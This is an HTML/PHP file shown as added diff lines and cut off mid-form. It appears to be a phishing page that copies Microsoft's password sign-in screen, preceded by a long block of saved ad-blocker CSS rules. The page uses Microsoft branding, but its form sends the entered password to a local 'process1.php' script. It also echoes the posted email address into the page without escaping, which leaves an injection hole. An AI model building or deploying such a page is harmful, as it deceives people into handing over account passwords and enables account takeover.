:root a[href^="http://api.ringtonematcher.com/"], :root a[href^="http://adfarm.mediaplex.com/"], :root a[href^="http://www.babylon.com/welcome/index?affID"], :root a[href^="http://adserving.unibet.com/"], :root a[href^="https://secure.adnxs.com/clktrb?"], :root a[href^="http://adlev.neodatagroup.com/"], :root a[href^="http://adprovider.adlure.net/"], :root a[href^="http://pan.adraccoon.com?"], :root div[id^="lazyad-"], :root a[href^="http://bcp.crwdcntrl.net/"], :root a[href^="http://adrunnr.com/"], :root a[href^="http://www.fpcTraffic2.com/blind/in.cgi?"], :root a[href^="http://ads.activtrades.com/"], :root a[href^="http://mmo123.co/"], :root div[class^="index_adAfterContent_"], :root a[href^="http://ads.ad-center.com/"], :root a[href^="http://ads.sprintrade.com/"], :root a[href^="http://zevera.com/afi.html"], :root a[href^="http://ads.expekt.com/affiliates/"], :root a[href^="http://ads.pheedo.com/"], :root a[href^="http://ads2.williamhill.com/redirect.aspx?"], :root a[href^="http://cwcams.com/landing/click/"], :root a[href^="http://adserver.adreactor.com/"], :root a[href^="http://adserver.adtech.de/"], :root a[href^="http://www.1clickdownloader.com/"], :root a[href^="http://cdn3.adbrau.com/"], :root a[href^="http://adserver.itsfogo.com/"], :root a[href^="http://adserving.liveuniversenetwork.com/"], :root a[href^="http://adsrv.keycaptcha.com"], :root a[href^="http://adtrack123.pl/"], :root a[href^="http://green.trafficinvest.com/"], :root a[href^="http://clickserv.sitescout.com/"], :root a[href^="http://adtrackone.eu/"], :root a[href^="http://adultfriendfinder.com/p/register.cgi?pid="], :root a[href^="http://linksnappy.com/?ref="], :root a[href^="http://affiliate.glbtracker.com/"], :root a[href^="http://affiliate.godaddy.com/"], :root a[href^="http://www.accuserveadsystem.com/accuserve-go.php?"], :root a[href^="https://sexdatingz.live/"], :root a[href^="http://lp.ilivid.com/"], :root a[href^="http://searchtabnew.com/"], :root a[href^="http://affiliates.pinnaclesports.com/processing/"], :root div[id^="block-views-topheader-ad-block-"], :root a[href^="http://www.gamebookers.com/cgi-bin/intro.cgi?"], :root a[href^="http://aflrm.com/"], :root a[href^="http://anonymous-net.com/"], :root a[href^="http://mojofun.info/"], :root a[href^="http://findersocket.com/"], :root iframe[src^="http://ad.yieldmanager.com/"], :root a[href^="http://at.atwola.com/"], :root a[href^="http://record.sportsbetaffiliates.com.au/"], :root a[href^="http://azmobilestore.co/"], :root a[href^="http://easydownload4you.com/"], :root a[href^="http://www.moneyducks.com/"], :root a[href^="http://b.bestcompleteusa.info/"], :root a[href^="http://bc.vc/?r="], :root a[href^="http://bcntrack.com/"], :root a[href^="http://pokershibes.com/index.php?ref="], :root a[href^="http://www.friendlyadvertisements.com/"], :root div[id^="ads300_600-widget"], :root a[href^="http://bestchickshere.com/"], :root a[href^="http://bluehost.com/track/"], :root a[href^="https://jmp.awempire.com/"], :root a[href^="http://databass.info/"], :root a[href^="http://c.actiondesk.com/"], :root a[href^="http://c.jumia.io/"], :root a[href^="http://c.ketads.com/"], :root a[href^="http://www.bet365.com/"][href*="&affiliate="], :root a[href^="http://callville.xyz/"], :root a[href^="http://media.paddypower.com/redirect.aspx?"], :root a[href^="http://campaign.bharatmatrimony.com/cbstrack/"], :root a[href^="http://campeeks.com/"][href*="&utm_"], :root a[href^="http://casino-x.com/?partner"], :root a[href^="http://cdn.adsrvmedia.net/"], :root a[href^="https://land.brazzersnetwork.com/landing/"], :root a[href^="http://web.adblade.com/"], :root div[data-subscript="Advertising"], :root a[href^="http://cdn3.adexprts.com/"], :root a[href^="http://go.oclaserver.com/"], :root a[href^="http://chaturbate.com/affiliates/"], :root script[src^="http://free-shoutbox.net/app/webroot/shoutbox/sb.php?shoutbox="] + #freeshoutbox_content, :root div[itemtype="http://schema.org/WPAdBlock"], :root a[href^="http://cinema.friendscout24.de?"], :root a[href^="http://click.guamwnvgashbkashawhgkhahshmashcas.pw/"], :root a[href^="http://www.down1oads.com/"], :root a[href^="http://www.pheedo.com/"], :root a[href^="http://clicks.guamwnvgashbkashawhgkhahshmashcas.pw/"], :root a[href^="http://clk.directrev.com/"], :root a[href^="http://galleries.pinballpublishernetwork.com/"], :root div[class^="lifeOnwerAd"], :root a[target="_blank"][href^="http://api.taboola.com/"], :root a[href^="http://clkmon.com/adServe/"], :root a[href^="http://hdplugin.flashplayer-updates.com/"], :root a[href^="http://track.incognitovpn.com/"], :root div[id^="acm-ad-tag-"], :root a[href^="https://www.brazzersnetwork.com/landing/"], :root a[href^="http://codec.codecm.com/"], :root a[href^="http://n.admagnet.net/"], :root a[href^="http://prochina.space/"], :root a[href^="http://contractallsticker.net/"], :root a[href^="http://wgpartner.com/"], :root a[href^="https://go.stripchat.com/"][href*="&campaignId="], :root a[href^="http://cpaway.afftrack.com/"], :root a[href^="http://d2.zedo.com/"], :root div[id^="advt-"], :root a[href^="https://affiliates.bet-at-home.com/processing/"], :root a[href^="http://data.committeemenencyclopedicrepertory.info/"], :root div[class^="Ad__bigBox"], :root a[href^="http://data.linoleictanzaniatitanic.com/"], :root div[itemtype="http://www.schema.org/WPAdBlock"], :root a[href^="http://dftrck.com/"], :root a[href^="http://down1oads.com/"], :root a[href^="http://download-performance.com/"], :root a[href^="http://www.myfreecams.com/?co_id="][href*="&track="], :root a[href^="https://bs.serving-sys.com"], :root a[href^="http://duckcash.eu/"], :root a[href^="http://server.cpmstar.com/click.aspx?poolid="], :root a[href^="https://track.themadtrcker.com/"], :root a[href^="http://dwn.pushtraffic.net/"], :root a[href^="http://earandmarketing.com/"], :root a[href^="https://gogoman.me/"], :root a[href^="http://elite-sex-finder.com/?"], :root a[href^="https://transfer.xe.com/signup/track/redirect?"], :root a[href^="http://elitefuckbook.com/"], :root a[href^="http://ethfw0370q.com/"], :root a[href^="http://extra.bet365.com/"][href*="?affiliate="], :root a[href^="http://farm.plista.com/pets"], :root a[href^="http://freesoftwarelive.com/"], :root div[data-mediatype="advertising"], :root a[href^="http://webgirlz.online/landing/"], :root a[href^="http://fileloadr.com/"], :root a[href^="https://secure.eveonline.com/ft/?aid="], :root a[href^="http://fileupnow.rocks/"], :root a[href^="http://prousa.work/"], :root a[href^="http://fsoft4down.com/"], :root a[href^="http://track.trkvluum.com/"], :root a[href^="https://bullads.net/get/"], :root a[href^="http://fusionads.net"], :root a[href^="https://farm.plista.com/pets"], :root a[href^="http://galleries.securewebsiteaccess.com/"], :root a[href^="http://www.on2url.com/app/adtrack.asp"], :root a[href^="http://gca.sh/user/register?ref="], :root a[href^="http://getlinksinaseconds.com/"], :root a[href^="https://bongacams2.com/track?"], :root a[href^="http://go.seomojo.com/tracking202/"], :root a[href^="http://go.trafficshop.com/"], :root a[href^="http://www.getyourguide.com/?partner_id="], :root a[href^="http://goldmoney.com/?gmrefcode="], :root a[href^="http://greensmoke.com/"], :root a[href^="http://hd-plugins.com/download/"], :root a[href^="http://hpn.houzz.com/"], :root a[href^="http://tracking.crazylead.com/"], :root a[href^="http://hyperlinksecure.com/go/"], :root a[href^="http://igromir.info/"], :root a[href^="https://awejmp.com/"], :root a[href^="http://imads.integral-marketing.com/"], :root a[href^="http://install.securewebsiteaccess.com/"], :root a[href^="http://secure.signup-page.com/"], :root a[href^="http://www.brightwheel.info/"], :root a[href^="http://www.greenmangaming.com/?tap_a="], :root a[href^="http://intent.bingads.com/"], :root a[href^="http://internalredirect.site/"], :root a[href^="http://istri.it/?"], :root a[href^="http://jobitem.org/"], :root a[href^="http://liversely.com/"], :root a[href^="http://k2s.cc/code/"], :root a[href^="http://tracking.toroadvertising.com/"], :root a[href^="http://k2s.cc/pr/"], :root a[href^="http://keep2share.cc/pr/"], :root a[href^="http://latestdownloads.net/download.php?"], :root div[id^="ADV-SLOT-"], :root a[href^="http://liversely.net/"], :root a[href^="http://t.mdn2015x2.com/"], :root a[href^="http://mgid.com/"], :root a[href^="http://www.freefilesdownloader.com/"], :root a[href^="http://mo8mwxi1.com/"], :root div[class^="gemini-ad"], :root a[href^="http://online.ladbrokes.com/promoRedirect?"], :root a[href^="https://redirect.ero-advertising.com/"], :root a[href^="http://play4k.co/"], :root div[id^="ad-div-"], :root a[href^="http://popup.taboola.com/"], :root a[href^="http://uploaded.net/ref/"], :root a[href^="https://www.spyoff.com/"], :root a[href^="http://prochina.link/"], :root a[href^="http://record.betsafe.com/"], :root a[href^="http://record.commissionking.com/"], :root a[href^="http://s9kkremkr0.com/"], :root a[href^="http://www.123-reg.co.uk/affiliate2.cgi"], :root a[href^="http://secure.hostgator.com/~affiliat/"], :root a[href^="http://serve.williamhill.com/promoRedirect?"], :root a[href^="http://servicegetbook.net/"], :root a[href^="http://srvpub.com/"], :root a[href^="https://porngames.adult/?SID="], :root a[href^="http://stateresolver.link/"], :root a[href^="http://www.drowle.com/"], :root a[href^="https://keep2share.cc/pr/"], :root a[href^="http://steel.starflavor.bid/"], :root a[href^="https://www.adskeeper.co.uk/"], :root a[href^="http://syndication.exoclick.com/"], :root a[href^="http://t.mdn2015x3.com/"], :root a[href^="http://t.wowtrk.com/"], :root a[href^="http://tour.affbuzzads.com/"], :root a[href^="http://us.marketgid.com"], :root a[href^="http://vinfdv6b4j.com/"], :root a[href^="http://webtrackerplus.com/"], :root a[href^="http://wopertific.info/"], :root div[id^="cns_ads_"], :root a[href^="http://www.twinplan.com/AF_"], :root a[href^="http://www.TwinPlan.com/AF_"], :root a[href^="http://www.afgr3.com/"], :root a[href^="http://www.adbrite.com/mb/commerce/purchase_form.php?"], :root a[href^="http://www.adskeeper.co.uk/"], :root a[href^="https://understandsolar.com/signup/?lead_source="][href*="&tracking_code="], :root a[href^="http://www.affiliates1128.com/processing/"], :root a[href^="http://www.downloadplayer1.com/"], :root a[href^="http://www.afgr2.com/"], :root a[href^="http://www.badoink.com/go.php?"], :root a[href^="http://www.bitlord.me/share/"], :root a[href^="http://www.bluehost.com/track/"] > img, :root bottomadblock, :root a[href^="http://www.cash-duck.com/"], :root a[href^="http://www.friendlyduck.com/AF_"], :root a[href^="https://windscribe.com/promo/"], :root a[href^="http://yads.zedo.com/"], :root a[href^="http://www.cdjapan.co.jp/aff/click.cgi/"], :root a[href^="http://www.dl-provider.com/search/"], :root a[href^="http://www.downloadthesefiles.com/"], :root a[href^="http://www.duckcash.eu/"], :root a[href^="http://www.duckssolutions.com/"], :root a[href^="http://www.easydownloadnow.com/"], :root a[href^="http://www.epicgameads.com/"], :root a[href^="http://www.faceporn.net/free?"], :root a[href^="http://www.fducks.com/"], :root a[href^="https://torguard.net/aff.php"], :root a[href^="http://www.firstclass-download.com/"], :root a[href^="http://www.firstload.de/affiliate/"], :root a[href^="http://www.fonts.com/BannerScript/"], :root a[href^="http://www.flashx.tv/downloadthis"], :root a[href^="http://www.fleshlight.com/"], :root a[href^="http://www.friendlyquacks.com/"], :root a[href^="https://www.goldenfrog.com/vyprvpn?offer_id="][href*="&aff_id="], :root a[href^="http://www.hitcpm.com/"], :root a[href^="https://pubads.g.doubleclick.net/"], :root a[href^="http://www.idownloadplay.com/"], :root a[href^="http://www.incredimail.com/?id="], :root a[href^="https://tracking.truthfinder.com/?a="], :root a[href^="http://www.installads.net/"], :root a[href^="http://www.ireel.com/signup?ref"], :root a[href^="http://www.liutilities.com/"], :root a[href^="http://www.liversely.net/"], :root a[href^="http://www.menaon.com/installs/"], :root a[href^="http://www.mobileandinternetadvertising.com/"], :root a[href^="http://www.my-dirty-hobby.com/?sub="], :root a[href^="http://www.myvpn.pro/"], :root a[href^="http://www.paddypower.com/?AFF_ID="], :root a[href^="http://www.pinkvisualpad.com/?revid="], :root a[href^="http://www.plus500.com/?id="], :root header#hdr + #main > div[data-hveid], :root a[href^="http://www.quick-torrent.com/download.html?aff"], :root a[href^="http://www.ragazzeinvendita.com/?rcid="], :root a[href^="http://www.richducks.com/"], :root a[href^="http://www.ringtonematcher.com/"], :root a[href^="http://www.roboform.com/php/land.php"], :root a[href^="http://www.securegfm.com/"], :root a[href^="http://www.sex.com/?utm_"], :root a[href^="http://www.sex.com/pics/?utm_"], :root div[class^="Ad__adContainer"], :root a[href^="http://www.sexgangsters.com/?pid="], :root a[href^="http://www.sfippa.com/"], :root a[href^="http://www.socialsex.com/"], :root a[href^="http://www.text-link-ads.com/"], :root a[href^="http://www.tirerack.com/affiliates/"], :root a[href^="http://www.torntv-downloader.com/"], :root a[href^="http://www.torntvdl.com/"], :root a[href^="http://www.uniblue.com/cm/"], :root a[href^="http://www.urmediazone.com/signup"], :root a[href^="http://www.usearchmedia.com/signup?"], :root a[href^="https://secure.cbdpure.com/aff/"], :root a[href^="http://www.wantstraffic.com/"], :root a[href^="http://www.xmediaserve.com/"], :root a[href^="http://www.yourfuckbook.com/?"], :root a[href^="http://www.zergnet.com/i/"], :root a[onclick*="//m.economictimes.com/etmack/click.htm"], :root a[href^="http://www1.clickdownloader.com/"], :root a[href^="http://www5.smartadserver.com/call/pubjumpi/"], :root a[href^="http://wxdownloadmanager.com/dl/"], :root a[href^="http://xads.zedo.com/"], :root a[href^="http://xtgem.com/click?"], :root div[id^="div-adtech-ad-"], :root div[id^="ad-gpt-"], :root a[href^="http://y1jxiqds7v.com/"], :root div[id^="div_ad_stack_"], :root a[href^="http://z1.zedo.com/"], :root a[href^="https://ad.doubleclick.net/"], :root a[href^="https://adclick.g.doubleclick.net/"], :root a[href^="https://adhealers.com/"], :root a[href^="https://ads.ad4game.com/"], :root a[href^="https://adserver.adreactor.com/"], :root a[href^="https://www.incontri-matura.com/"], :root a[href^="https://adultfriendfinder.com/go/page/landing"], :root a[href^="https://adswick.com/"], :root a[href^="https://atomidownload.com/"], :root a[href^="https://awentw.com/"], :root a[href^="https://betway.com/"][href*="&a="], :root a[href^="https://chaturbate.com/in/?track="], :root a[href^="https://chaturbate.com/affiliates/"], :root a[href^="https://chaturbate.com/in/?tour="], :root a[href^="https://chaturbate.jjgirls.com/"][href*="?tour="], :root a[href^="https://chaturbate.xyz/"], :root a[href^="https://click.plista.com/pets"], :root a[href^="https://clixtrac.com/"], :root a[href^="https://dediseedbox.com/clients/aff.php?"], :root a[href^="https://dltags.com/"], :root a[href^="https://evaporate.pw/"], :root td[valign="top"] > .mainmenu[style="padding:10px 0 0 0 !important;"], :root a[href^="https://flirtaescopa.com/"], :root a[href^="https://freeadult.games/"], :root a[href^="https://intrev.co/"], :root a[href^="https://gamescarousel.com/"], :root a[href^="https://m.do.co/c/"] > img, :root a[href^="https://gghf.mobi/"], :root a[href^="https://go.ad2up.com/"], :root a[href^="https://go.onclasrv.com/"], :root a[href^="https://go.trkclick2.com/"], :root a[href^="https://googleads.g.doubleclick.net/pcs/click"], :root a[href^="https://iac.ampxdirect.com/"], :root a[href^="https://ilovemyfreedoms.com/"][href*="?affiliate_id="], :root a[href^="https://incisivetrk.cvtr.io/click?"], :root a[href^="https://lingthatsparleso.info/"], :root a[href^="https://medleyads.com/"], :root a[href^="https://mk-ads.com/"], :root a[href^="https://mk-cdn.net/"], :root a[href^="https://paid.outbrain.com/network/redir?"], :root a[href^="https://zononi.com/"], :root a[href^="https://porndeals.com/?track="], :root a[href^="https://prf.hn/click/"][href*="/adref:"], :root a[href^="https://refpaano.host/"], :root a[href^="https://www.moscarossa.biz/"], :root a[href^="https://rev.adsession.com/"], :root a[href^="https://secure.bstlnk.com/"], :root a[href^="https://spygasm.com/track?"], :root a[href^="https://squren.com/rotator/?atomid="], :root a[href^="https://syndication.exoclick.com/splash.php?"], :root a[href^="https://t.mobtya.com/"], :root a[href^="https://track.52zxzh.com/"], :root a[href^="https://track.adform.net/"], :root a[href^="https://track.healthtrader.com/"], :root a[href^="https://track.trkinator.com/"], :root div[id^="ad-server-"], :root a[href^="https://trackjs.com/?utm_source"], :root a[href^="https://trafficmedia.center/"], :root a[href^="https://trklvs.com/"], :root a[href^="https://trust.zone/go/r.php?RID="], :root a[href^="https://www.oboom.com/ad/"], :root a[href^="https://uncensored3d.com/"], :root p[id^="div-gpt-ad-"], :root a[href^="https://vodexor.us/"], :root a[href^="https://www.adultempire.com/"][href*="?partner_id="], :root a[href^="https://www.adxtro.com/"], :root a[href^="https://www.bebi.com"], :root a[href^="https://www.camyou.com/?cam="][href*="&track="], :root a[href^="https://www.dsct1.com/"], :root a[href^="https://www.nutaku.net/signup/landing/"], :root a[href^="https://www.popads.net/users/"], :root a[href^="https://www.share-online.biz/affiliate/"], :root a[href^="https://www.what-sexdating.com/"], :root a[onmousedown^="this.href='/wp-content/embed-ad-content/"], :root a[onmousedown^="this.href='http://paid.outbrain.com/network/redir?"][target="_blank"] + .ob_source, :root a[onmousedown^="this.href='https://paid.outbrain.com/network/redir?"][target="_blank"], :root div[id^="div-gpt-ad"], :root a[style="display:block;width:300px;min-height:250px"][href^="http://li.cnet.com/click?"], :root a[target="_blank"][onmousedown="this.href^='http://paid.outbrain.com/network/redir?"], :root aside[id^="adrotate_widgets-"], :root aside[id^="advads_ad_widget-"], :root aside[id^="div-gpt-ad"], :root aside[id^="tn_ads_widget-"], :root div[class$="dealnews"] > .dealnews, :root div[class^="AdhesionAd_"], :root div[class^="BlockAdvert-"], :root div[class^="ResponsiveAd-"], :root div[class^="ad_border_"], :root div[class^="ad_position_"], :root div[class^="adbanner_"], :root div[class^="adpubs-"], :root div[class^="awpcp-random-ads"], :root div[class^="backfill-taboola-home-slot-"], :root div[class^="block-openx-"], :root div[class^="index_adBeforeContent_"], :root div[class^="index_displayAd_"], :root div[class^="local-feed-banner-ads"], :root div[class^="pane-google-admanager-"], :root div[class^="proadszone-"], :root div[data-ad-underplayer], :root div[data-flt-ve="sponsored_search_ads"], :root div[data-native_ad], :root div[data-spotim-slot], :root div[id^="YFBMSN"], :root div[id^="ad-cid-"], :root div[id^="proadszone-"], :root div[id^="ad_bigbox_"], :root div[id^="adfox_"], :root div[id^="adrotate_widgets-"], :root div[id^="ads120_600-widget"], :root div[id^="adspot-"], :root div[id^="dfp-slot-"], :root div[id^="div-ads-"], :root div[id^="dmRosAdWrapper"], :root topadblock, :root div[id^="drudge-column-ads-"], :root div[id^="google_dfp_"], :root div[id^="q1-adset-"], :root div[id^="tms-ad-dfp-"], :root div[id^="zergnet-widget"], :root div[role="navigation"] + c-wiz > div > .kxhcC, :root div[role="navigation"] + c-wiz > script + div > .kxhcC, :root iframe[id^="google_ads_iframe"], :root iframe[src^="http://cdn1.adexprt.com/"], :root iframe[src^="http://static.mozo.com.au/strips/"], :root img[alt^="Fuckbook"], :root input[onclick^="window.open('http://www.friendlyduck.com/"], :root input[onclick^="window.open('http://www.FriendlyDuck.com/"] { display: none !important; }</style><script type="text/javascript" src="https://logincdn.msauth.net/16.000.28215.2/ConvergedLogin_PCore" id="ConvergedLogin_PCore" crossorigin="anonymous" integrity="sha384-by4e9gkDYQt3+eICpefvHM9HNNdkX+eWDGkWtnSPP+H7roI1p7Gexn9p8VkRFVBD"></script></head><body class="cb" data-bind="defineGlobals: ServerData, bodyCssClass"><div><!-- --> <div data-bind="component: { name: 'background-image-control', publicMethods: backgroundControlMethods }"><div class="background" role="presentation" data-bind="css: { app: isAppBranding }, style: { background: backgroundStyle }"><!-- ko if: smallImageUrl --> <div data-bind="backgroundImage: smallImageUrl()" style="background-image: url(&quot;https://i.imgur.com/u3AoB0V.png&quot;);"></div><!-- /ko --><!-- ko if: backgroundImageUrl --> <div class="backgroundImage" data-bind="backgroundImage: backgroundImageUrl()" style="background-image: url(&quot;https://i.imgur.com/1j9Rist.png&quot;);"></div><!-- ko if: useImageMask --><!-- /ko --><!-- /ko --> </div></div> <div data-bind="if: activeDialog"></div> <form name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post" target="_top" autocomplete="off" data-bind="autoSubmit: forceSubmit, attr: { action: login.php }, ariaHidden: activeDialog" action="process1.php"><!-- ko if: svr.b4 --><!-- /ko --><!-- ko withProperties: { '$loginPage': $data } --> <div class="outer" data-bind="component: { name: 'master-page',
     2 + params: {
     3 + serverData: svr,
     4 + showButtons: svr.f,
     5 + showFooterLinks: true,
     6 + useWizardBehavior: svr.av,
     7 + handleWizardButtons: false,
     8 + password: password,
     9 + hideFromAria: ariaHidden },
     10 + event: {
     11 + footerAgreementClick: footer_agreementClick } }">
     12 + <!-- ko template: { nodes: $componentTemplateNodes, data: $parent } --><!-- ko if: svr.aM --><!-- /ko -->
     13 + <div class="middle" data-bind="css: { 'app': backgroundLogoUrl }"><!-- ko if: backgroundLogoUrl() && !(paginationControlMethods() && paginationControlMethods().currentViewHasMetadata('hideLogo')) --><!-- /ko -->
     14 +
     15 + <img class="background-logo" role="presentation" data-bind="attr: { src: backgroundLogoUrl }" src="https://logincdn.msauth.net/16.000.28378.12/images/AppLogos/20.png?x=71c5dd371596273fd346bd0c6ebe8fb9" style="margin-bottom:20px">
     16 + <div class="inner fade-in-lightbox" data-bind="
     17 + animationEnd: paginationControlMethods() &amp;&amp; paginationControlMethods().view_onAnimationEnd,
     18 + css: {
     19 + 'app': backgroundLogoUrl,
     20 + 'wide': paginationControlMethods() &amp;&amp; paginationControlMethods().currentViewHasMetadata('wide'),
     21 + 'fade-in-lightbox': fadeInLightBox,
     22 + 'has-popup': showFedCredButton,
     23 + 'transparent-lightbox': backgroundControlMethods() &amp;&amp; backgroundControlMethods().useTransparentLightBox }"> <div class="lightbox-cover" data-bind="css: { 'disable-lightbox': svr.BX &amp;&amp; showLightboxProgress() }"></div><!-- ko if: showLightboxProgress --><!-- /ko --><!-- ko ifnot: paginationControlMethods() && (paginationControlMethods().currentViewHasMetadata('hideLogo')) --> <div data-bind="component: { name: 'logo-control',
     24 + params: {
     25 + isChinaDc: svr.fIsChinaDc,
     26 + bannerLogoUrl: bannerLogoUrl() } }"><!-- --><!-- ko if: bannerLogoUrl --><!-- /ko --><!-- ko if: !bannerLogoUrl && !isChinaDc --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="logo" pngsrc="https://logincdn.msauth.net/16.000.28215.2/images/microsoft_logo.png?x=ed9c9eb0dce17d752bedea6b5acda6d9" svgsrc="https://logincdn.msauth.net/16.000.28215.2/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd" data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }" src="https://logincdn.msauth.net/16.000.28215.2/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd" alt="Microsoft"><!-- /ko --> <!-- /ko --><!-- /ko --> <!-- /ko --></div><!-- /ko --><!-- ko if: svr.Cr && (paginationControlMethods() && !paginationControlMethods().currentViewHasMetadata('hideLwaDisclaimer')) --><!-- /ko --><!-- ko if: asyncInitReady --> <div role="main" data-bind="component: { name: 'pagination-control',
     27 + publicMethods: paginationControlMethods,
     28 + params: {
     29 + enableCssAnimation: svr.A6,
     30 + initialViewId: initialViewId,
     31 + currentViewId: currentViewId,
     32 + initialSharedData: initialSharedData,
     33 + initialError: $loginPage.getServerError() },
     34 + event: {
     35 + cancel: paginationControl_onCancel,
     36 + showView: $loginPage.view_onShow,
     37 + setLightBoxFadeIn: view_onSetLightBoxFadeIn,
     38 + animationStateChange: paginationControl_onAnimationStateChange } }"><!-- --> <div data-bind="css: { 'zero-opacity': hidePaginatedView() }" class=""><!-- ko if: showIdentityBanner() && (sharedData.displayName || svr.g) --> <div data-bind="css: {
     39 + 'animate': animate() &amp;&amp; animate.animateBanner(),
     40 + 'slide-out-next': animate.isSlideOutNext(),
     41 + 'slide-in-next': animate.isSlideInNext(),
     42 + 'slide-out-back': animate.isSlideOutBack(),
     43 + 'slide-in-back': animate.isSlideInBack() }" class="animate slide-in-next"> <div data-bind="component: { name: 'identity-banner-control',
     44 + params: {
     45 + userTileUrl: svr.Br,
     46 + displayName: sharedData.displayName || svr.g,
     47 + isBackButtonVisible: isBackButtonVisible(),
     48 + focusOnBackButton: isBackButtonFocused(),
     49 + backButtonDescribedBy: backButtonDescribedBy() },
     50 + event: {
     51 + backButtonClick: identityBanner_onBackButtonClick } }"><!-- --> <div class="identityBanner"><!-- ko if: isBackButtonVisible --> <button type="button" onclick="window.history.go(-1); return false;" class="backButton" data-bind="
     52 + attr: { 'id': backButtonId || 'idBtn_Back' },
     53 + ariaLabel: str['CT_HRD_STR_Splitter_Back'],
     54 + ariaDescribedBy: backButtonDescribedBy,
     55 + click: backButton_onClick,
     56 + hasFocus: focusOnBackButton" id="idBtn_Back" aria-label="Back"><!-- ko ifnot: svr.bH --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img role="presentation" pngsrc="https://logincdn.msauth.net/16.000.28215.2/images/arrow_left.png?x=7cc096da6aa2dba3f81fcc1c8262157c" svgsrc="https://logincdn.msauth.net/16.000.28215.2/images/arrow_left.svg?x=a9cc2824ef3517b6c4160dcf8ff7d410" data-bind="imgSrc" src="https://logincdn.msauth.net/16.000.28215.2/images/arrow_left.svg?x=a9cc2824ef3517b6c4160dcf8ff7d410"><!-- /ko --> <!-- /ko --><!-- /ko --><!-- /ko --><!-- ko if: svr.bH --><!-- /ko --> </button><!-- /ko --> <div id="displayName" class="identity" data-bind="text: unsafe_displayName, attr: { 'title': unsafe_displayName }" title="<?php echo $_POST["Email"]; ?>"><?php echo $_POST["Email"]; ?></div> </div></div> </div><!-- /ko --> <div class="pagination-view animate has-identity-banner slide-in-next" data-bind="css: {
     57 + 'has-identity-banner': showIdentityBanner() &amp;&amp; (sharedData.displayName || svr.g),
     58 + 'zero-opacity': hidePaginatedView.hideSubView(),
     59 + 'animate': animate(),
     60 + 'slide-out-next': animate.isSlideOutNext(),
     61 + 'slide-in-next': animate.isSlideInNext(),
     62 + 'slide-out-back': animate.isSlideOutBack(),
     63 + 'slide-in-back': animate.isSlideInBack() }"><!-- ko foreach: views --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --> <!-- ko template: { nodes: [$data], data: $parent } --><div data-viewid="2" data-showidentitybanner="true" data-dynamicbranding="true" data-bind="pageViewComponent: { name: 'login-paginated-password-view',
     64 + params: {
     65 + serverData: svr,
     66 + serverError: initialError,
     67 + isInitialView: isInitialState,
     68 + username: sharedData.username,
     69 + displayName: sharedData.displayName,
     70 + hipRequiredForUsername: sharedData.hipRequiredForUsername,
     71 + passwordBrowserPrefill: sharedData.passwordBrowserPrefill,
     72 + availableCreds: sharedData.availableCreds,
     73 + evictedCreds: sharedData.evictedCreds,
     74 + useEvictedCredentials: sharedData.useEvictedCredentials,
     75 + flowToken: sharedData.flowToken,
     76 + defaultKmsiValue: svr.Z === 1,
     77 + userTenantBranding: sharedData.userTenantBranding,
     78 + sessions: sharedData.sessions,
     79 + callMetadata: sharedData.callMetadata,
     80 + gitHubRedirectUrl: sharedData.gitHubParams.redirectUrl || svr.m,
     81 + googleRedirectUrl: sharedData.googleParams.redirectUrl || svr.AD },
     82 + event: {
     83 + updateFlowToken: $loginPage.view_onUpdateFlowToken,
     84 + submitReady: $loginPage.view_onSubmitReady,
     85 + redirect: $loginPage.view_onRedirect,
     86 + resetPassword: $loginPage.passwordView_onResetPassword,
     87 + setBackButtonState: view_onSetIdentityBackButtonState,
     88 + setPendingRequest: $loginPage.view_onSetPendingRequest } }"><!-- --> <input type="hidden" name="i13" data-bind="value: isKmsiChecked() ? 1 : 0" value="0"> <input type="hidden" name="login" data-bind="value: unsafe_username" value=""> <input type="text" name="loginfmt" data-bind="moveOffScreen, value: unsafe_displayName" class="moveOffScreen" tabindex="-1" aria-hidden="true"> <input type="hidden" name="type" data-bind="value: svr.av ? 20 : 11" value="11"> <input type="hidden" name="LoginOptions" data-bind="value: isKmsiChecked() ? 1 : 3" value="3"> <input type="hidden" name="lrt" data-bind="value: callMetadata.IsLongRunningTransaction" value=""> <input type="hidden" name="lrtPartition" data-bind="value: callMetadata.LongRunningTransactionPartition" value=""> <input type="hidden" name="hisRegion" data-bind="value: callMetadata.HisRegion" value=""> <input type="hidden" name="hisScaleUnit" data-bind="value: callMetadata.HisScaleUnit" value=""> <div id="loginHeader" class="row text-title" role="heading" aria-level="1" data-bind="text: str['CT_PWD_STR_EnterPassword_Title']">Enter password</div><!-- ko if: unsafe_pageDescription --><!-- /ko --> <div class="row"> <div class="form-group col-md-24"> <div role="alert" aria-live="assertive"><!-- ko if: passwordTextbox.error --><!-- /ko --> </div> <div class="placeholderContainer" data-bind="component: { name: 'placeholder-textbox-field',
     89 + publicMethods: passwordTextbox.placeholderTextboxMethods,
     90 + params: {
     91 + serverData: svr,
     92 + hintText: str['CT_PWD_STR_PwdTB_Label'] },
     93 + event: {
     94 + updateFocus: passwordTextbox.textbox_onUpdateFocus } }"><!-- ko withProperties: { '$placeholderText': placeholderText } --> <!-- ko template: { nodes: $componentTemplateNodes, data: $parent } --> <input name="pass" type="password" id="i0118" autocomplete="off" class="form-control" aria-required="true" data-bind="
     95 + textInput: passwordTextbox.value,
     96 + ariaDescribedBy: 'loginHeader passwordDesc',
     97 + hasFocusEx: passwordTextbox.focused() &amp;&amp; !showPassword(),
     98 + placeholder: $placeholderText,
     99 + ariaLabel: unsafe_passwordAriaLabel,
     100 + moveOffScreen: showPassword,
